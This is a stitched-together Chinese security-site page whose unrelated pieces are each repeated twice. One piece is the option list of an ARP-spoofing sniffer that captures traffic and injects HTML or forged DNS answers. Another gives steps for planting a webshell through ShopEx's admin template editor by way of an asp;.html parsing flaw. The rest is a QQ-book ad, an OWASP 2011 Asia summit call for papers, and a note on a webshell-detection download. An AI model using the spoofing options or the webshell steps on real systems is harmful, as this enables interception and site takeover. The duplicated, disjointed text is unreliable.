1. WAN (PPP/SLIP) Interface
IP Address. . . . . : xx.xx.xx.xx
Physical Address. . : 00-52-00-00-00-00
Default Gateway . . : xx.xx.xx.xx
options(参数说明):
-idx [index] 网卡索引号
-ip [ip] 欺骗的IP,用’-'指定范围,’,'隔开
-sethost [ip] 默认是网关,可以指定别的IP
-port [port] 关注的端口,用’-'指定范围,’,'隔开,没指定默认关注所有端口
-reset 恢复目标机的ARP表
-hostname 探测主机时获取主机名信息
-logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,
‘,’隔开关键字,多个条件’|'隔开
所有带+前缀的关键字都出现的包则写入文件
带-前缀的关键字出现的包不写入文件
带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)
-save_a [filename] 将捕捉到的数据写入文件 ACSII模式
-save_h [filename] HEX模式
-hacksite [ip] 指定要插入代码的站点域名或IP,
多个可用’,'隔开,没指定则影响所有站点
-insert [html code]指定要插入html代码
-postfix [string] 关注的后缀名,只关注HTTP/1.1 302
-hackURL [url] 发现关注的后缀名后修改URL到新的URL
-filename [name] 新URL上有效的资源文件名
-hackdns [string] DNS欺骗,只修改UDP的报文,多个可用’,'隔开
格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1
-Interval [ms] 定时欺骗的时间间隔,默认是3秒
-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者
-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB
0. Realtek RTL8139
IP Address. . . . . : 192.168.1.101
Physical Address. . : 00-11-D8-6B-5E-19
Default Gateway . . : 192.168.1.1
1. WAN (PPP/SLIP) Interface
IP Address. . . . . : xx.xx.xx.xx
Physical Address. . : 00-52-00-00-00-00
Default Gateway . . : xx.xx.xx.xx
options(参数说明):
-idx [index] 网卡索引号
-ip [ip] 欺骗的IP,用’-'指定范围,’,'隔开
-sethost [ip] 默认是网关,可以指定别的IP
-port [port] 关注的端口,用’-'指定范围,’,'隔开,没指定默认关注所有端口
-reset 恢复目标机的ARP表
-hostname 探测主机时获取主机名信息
-logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,
‘,’隔开关键字,多个条件’|'隔开
所有带+前缀的关键字都出现的包则写入文件
带-前缀的关键字出现的包不写入文件
带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)
-save_a [filename] 将捕捉到的数据写入文件 ACSII模式
-save_h [filename] HEX模式
-hacksite [ip] 指定要插入代码的站点域名或IP,
多个可用’,'隔开,没指定则影响所有站点
-insert [html code]指定要插入html代码
-postfix [string] 关注的后缀名,只关注HTTP/1.1 302
-hackURL [url] 发现关注的后缀名后修改URL到新的URL
-filename [name] 新URL上有效的资源文件名
-hackdns [string] DNS欺骗,只修改UDP的报文,多个可用’,'隔开
格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1
-Interval [ms] 定时欺骗的时间间隔,默认是3秒
-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者
-speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB
前段时间遇到了shopex的后台,进去后不知道如何拿shell,让朋友给我拿的。
今天看到次漏洞,所以记录下来,已被以后使用!
利用方法:
后台 > 页面管理 > 模板列表 > 编辑模板 > 源码编辑
这里编辑的是 index.html 文件,可以在url里面修改,然后保存为其它的文件。
发现V4.84可以修改成任意后缀,V4.85好像必须要是html,可以用asp;.html解析利用。
写入脚本 > 保存
现在很多后台管理系统都都存在 *.asp;*.html 模板解析漏洞。
今天看到次漏洞,所以记录下来,已被以后使用!
利用方法:
后台 > 页面管理 > 模板列表 > 编辑模板 > 源码编辑
这里编辑的是 index.html 文件,可以在url里面修改,然后保存为其它的文件。
发现V4.84可以修改成任意后缀,V4.85好像必须要是html,可以用asp;.html解析利用。
写入脚本 > 保存
现在很多后台管理系统都都存在 *.asp;*.html 模板解析漏洞。
《玩转QQ系列经典合辑》再度袭来,至于你买不买,反正老子又买了。
A:听说非安全推出玩转QQ系列经典合辑了!
B:你买了没?
A:当然买了。老子都买了,我们能不买吗!
B:我也买了,看了玩转QQ经典合辑,腰不酸了,腿不疼了,上网泡妞也有劲了。
玩转QQ系列经典合辑,网罗另类QQ炫技,轻松成为炫Q达人,我的QQ我做主,誓将免费进行到底。
合辑在手,玩转QQ,泡妞无忧。
以上情节,如有雷同,绝对抄袭~
玩转QQ系列经典合辑封面
合辑封面图
玩转QQ系列经典合辑宣传海报
合辑宣传海报
非安全淘宝店订购 非安全在线商城订购 非安全官方微博
填写回执,赢取双重大奖,500名中奖机会。(注意:本次回执一人一卡,复印以及电子回执无效)
大奖1:赢取知名品牌U盘,甄选6名幸运读者:
一等奖:1名,赠送16G U盘;
二等奖:2名,赠送8G U盘;
三等奖:3名,赠送4G U盘。
大奖2:凡是前500名回执者,百分百赠送如下奖项,只能三选一(请勾选前面的序号):
① 开通开钻平台账户权限;
② 赠送靓号资源;
③ 作者添加其为QQ好友,私密日志看、QQ秀免费合影、图书编辑抓图上杂志。
A:听说非安全推出玩转QQ系列经典合辑了!
B:你买了没?
A:当然买了。老子都买了,我们能不买吗!
B:我也买了,看了玩转QQ经典合辑,腰不酸了,腿不疼了,上网泡妞也有劲了。
玩转QQ系列经典合辑,网罗另类QQ炫技,轻松成为炫Q达人,我的QQ我做主,誓将免费进行到底。
合辑在手,玩转QQ,泡妞无忧。
以上情节,如有雷同,绝对抄袭~
玩转QQ系列经典合辑封面
合辑封面图
玩转QQ系列经典合辑宣传海报
合辑宣传海报
非安全淘宝店订购 非安全在线商城订购 非安全官方微博
填写回执,赢取双重大奖,500名中奖机会。(注意:本次回执一人一卡,复印以及电子回执无效)
大奖1:赢取知名品牌U盘,甄选6名幸运读者:
一等奖:1名,赠送16G U盘;
二等奖:2名,赠送8G U盘;
三等奖:3名,赠送4G U盘。
大奖2:凡是前500名回执者,百分百赠送如下奖项,只能三选一(请勾选前面的序号):
① 开通开钻平台账户权限;
② 赠送靓号资源;
③ 作者添加其为QQ好友,私密日志看、QQ秀免费合影、图书编辑抓图上杂志。
会议介绍
作为全球顶级的Web应用安全组织,OWASP(Open Web Application Security Project)中国将于11月8日-9日在北京举办OWASP 2011亚洲峰会,本次大会特意邀请政府、金融、互联网、教育、电信、能源等热门行业的CIO代表,国内外知名的应用安全专家、厂商代表共聚一堂,就应用安全及业务安全发展及技术创新等话题进行广泛而深入的讨论,同时也为广大从事应用安全研究的技术人员提供一个多元化的交流平台。我们聚合产官学力量,推动中国应用安全市场发展。
时 间:2011年11月8日-11月9日 OWASP亚洲峰会+安全产品展
2011年11月10日-11月11日 安全培训
地 点:北京国际会议中心(北京市朝阳区北辰东路8号)
OWASP组织介绍
OWASP是一个开源的、非盈利的全球性安全组织,致力于应用软件的安全研究。我们的使命是使应用软件更加安全,使企业和组织能够对应用安全风险作出更清晰的决策。目前OWASP全球拥有130个分会近万名会员,共同推动了安全标准、安全测试工具、安全指导手册等应用安全技术的发展。
近几年,OWASP峰会以及各国OWASP年会均取得了巨大的成功,推动了数以百万的IT从业人员对应用安全的关注以及理解,并为各类企业的应用安全提供了明确的指引。OWASP在业界影响力:美国联邦贸易委员会(FTC)强烈建议所有企业需遵循OWASP所发布的十大Web弱点防护守则、 美国国防部亦列为最佳实务,国际信用卡数据安全技术PCI标准更将其列为必要组件。
OWASP研究内容:目前OWASP有30多个进行中的计划,包括最知名的OWASP Top 10(十大Web威胁)、WebGoat (用来演示Web应用程序中的典型安全漏洞的应用程序)练习平台、安全PHP/Java/ASP.Net等计划,针对不同的软件安全问题在进行讨论与研究。
会议相关内容介绍
一.活动概要
1. 本次峰会覆盖亚洲区域,总参与预计800人次。
2. 邀请全球及国内顶级应用安全专家进行深度技术演讲。
3. 覆盖政府、金融、银行证券、教育、运营商、互联网、各大企业,资深应用安全人士的深度参与。
4. 丰富的应用安全项目及产品演示平台,全面展示业界顶级的安全技术及产品。
5. 多家国内外知名网站的全程活动报道;
二.会议目的
1. OWASP2011亚洲峰会,将使亚洲地区各行业安全精英汇集一堂,探讨应用安全热点话题,分享先进技术,引领互联网应用安全及业务安全的良性发展;
2. 深入探讨应用安全领域技术热点,全面展示互联网应用安全及业务安全解决方案,多方位共享行业最前沿技术。
3. 剖析最全面、最前沿的应用安全技术;
4. 全面专业的应用安全技术及产品展示,推动国内应用安全技术的发展。
三.参会人员
本活动参会对象主要有:
亚太地区各行业安全专家
政府机构
电信运营商及设备制造商
能源行业CIO及行业集成商
安全厂商
软件应用开发商
应用安全领域领航者与关注者
全国各大知名企业安全人员
行业媒体
OWASP2011亚洲峰会演讲议题征集
OWASP2011亚洲峰会将是一场盛大的国际会议,将汇集最新研究成果和最尖端的应用安全知识。我们邀请全球应用安全研究者们参与此次会议。
议题征集范围(不限于以下范围)
Web应用安全
移动应用安全
云应用安全
应用安全软件和架构模型
应用安全度量
OWASP工具和项目
安全编码 (J2EE/.NET)
应用安全测试
最新攻击和防护
其他和OWASP和应用安全相关的主题
议题投递说明
1. 议题投递邮箱: rip#owasp.org.cn helen.gao#owasp.org(海外)(请将#替换成@)
2. 议题投递时,请包括以下内容:
1)议题的PPT及该议题的论文,可一起提交,也可仅提交PPT;
2)议题的简单描述,议题是否发布新的工具,是否发布新的漏洞;
3)议题演讲所需要的时间;
4)演讲者工作经历描述及目前所在公司;
5)演讲者联系信息:姓名、网络ID、联系电话、电子邮件。
3. 截止日期:2011年8月22日
审核通过日期:2011年9月9日
提交演示文档日期:2011年10月21日
演讲者待遇
1. 往返北京经济舱全额机票(限1人)
2. 会议期间的食宿费用
3. 免费邀请10名嘉宾参会
4. 免费参加OWASP峰会培训(限1人)
欢迎大家提供新的议题方向。
联系我们:
Rip: Rip#owasp.org.cn 0755-88877606
Ivy: Ivy#owasp.org.cn 0755-88877909
作为全球顶级的Web应用安全组织,OWASP(Open Web Application Security Project)中国将于11月8日-9日在北京举办OWASP 2011亚洲峰会,本次大会特意邀请政府、金融、互联网、教育、电信、能源等热门行业的CIO代表,国内外知名的应用安全专家、厂商代表共聚一堂,就应用安全及业务安全发展及技术创新等话题进行广泛而深入的讨论,同时也为广大从事应用安全研究的技术人员提供一个多元化的交流平台。我们聚合产官学力量,推动中国应用安全市场发展。
时 间:2011年11月8日-11月9日 OWASP亚洲峰会+安全产品展
2011年11月10日-11月11日 安全培训
地 点:北京国际会议中心(北京市朝阳区北辰东路8号)
OWASP组织介绍
OWASP是一个开源的、非盈利的全球性安全组织,致力于应用软件的安全研究。我们的使命是使应用软件更加安全,使企业和组织能够对应用安全风险作出更清晰的决策。目前OWASP全球拥有130个分会近万名会员,共同推动了安全标准、安全测试工具、安全指导手册等应用安全技术的发展。
近几年,OWASP峰会以及各国OWASP年会均取得了巨大的成功,推动了数以百万的IT从业人员对应用安全的关注以及理解,并为各类企业的应用安全提供了明确的指引。OWASP在业界影响力:美国联邦贸易委员会(FTC)强烈建议所有企业需遵循OWASP所发布的十大Web弱点防护守则、 美国国防部亦列为最佳实务,国际信用卡数据安全技术PCI标准更将其列为必要组件。
OWASP研究内容:目前OWASP有30多个进行中的计划,包括最知名的OWASP Top 10(十大Web威胁)、WebGoat (用来演示Web应用程序中的典型安全漏洞的应用程序)练习平台、安全PHP/Java/ASP.Net等计划,针对不同的软件安全问题在进行讨论与研究。
会议相关内容介绍
一.活动概要
1. 本次峰会覆盖亚洲区域,总参与预计800人次。
2. 邀请全球及国内顶级应用安全专家进行深度技术演讲。
3. 覆盖政府、金融、银行证券、教育、运营商、互联网、各大企业,资深应用安全人士的深度参与。
4. 丰富的应用安全项目及产品演示平台,全面展示业界顶级的安全技术及产品。
5. 多家国内外知名网站的全程活动报道;
二.会议目的
1. OWASP2011亚洲峰会,将使亚洲地区各行业安全精英汇集一堂,探讨应用安全热点话题,分享先进技术,引领互联网应用安全及业务安全的良性发展;
2. 深入探讨应用安全领域技术热点,全面展示互联网应用安全及业务安全解决方案,多方位共享行业最前沿技术。
3. 剖析最全面、最前沿的应用安全技术;
4. 全面专业的应用安全技术及产品展示,推动国内应用安全技术的发展。
三.参会人员
本活动参会对象主要有:
亚太地区各行业安全专家
政府机构
电信运营商及设备制造商
能源行业CIO及行业集成商
安全厂商
软件应用开发商
应用安全领域领航者与关注者
全国各大知名企业安全人员
行业媒体
OWASP2011亚洲峰会演讲议题征集
OWASP2011亚洲峰会将是一场盛大的国际会议,将汇集最新研究成果和最尖端的应用安全知识。我们邀请全球应用安全研究者们参与此次会议。
议题征集范围(不限于以下范围)
Web应用安全
移动应用安全
云应用安全
应用安全软件和架构模型
应用安全度量
OWASP工具和项目
安全编码 (J2EE/.NET)
应用安全测试
最新攻击和防护
其他和OWASP和应用安全相关的主题
议题投递说明
1. 议题投递邮箱: rip#owasp.org.cn helen.gao#owasp.org(海外)(请将#替换成@)
2. 议题投递时,请包括以下内容:
1)议题的PPT及该议题的论文,可一起提交,也可仅提交PPT;
2)议题的简单描述,议题是否发布新的工具,是否发布新的漏洞;
3)议题演讲所需要的时间;
4)演讲者工作经历描述及目前所在公司;
5)演讲者联系信息:姓名、网络ID、联系电话、电子邮件。
3. 截止日期:2011年8月22日
审核通过日期:2011年9月9日
提交演示文档日期:2011年10月21日
演讲者待遇
1. 往返北京经济舱全额机票(限1人)
2. 会议期间的食宿费用
3. 免费邀请10名嘉宾参会
4. 免费参加OWASP峰会培训(限1人)
欢迎大家提供新的议题方向。
联系我们:
Rip: Rip#owasp.org.cn 0755-88877606
Ivy: Ivy#owasp.org.cn 0755-88877909
写的关于WebShell的检测技术,都是概念性的东西,对于技术人员来说基本没有价值,但是,给某些不懂的人来说,还可以做个大概的了解,了解下概念还行。
下载文件 (已下载 95 次)
下载文件 (已下载 95 次)
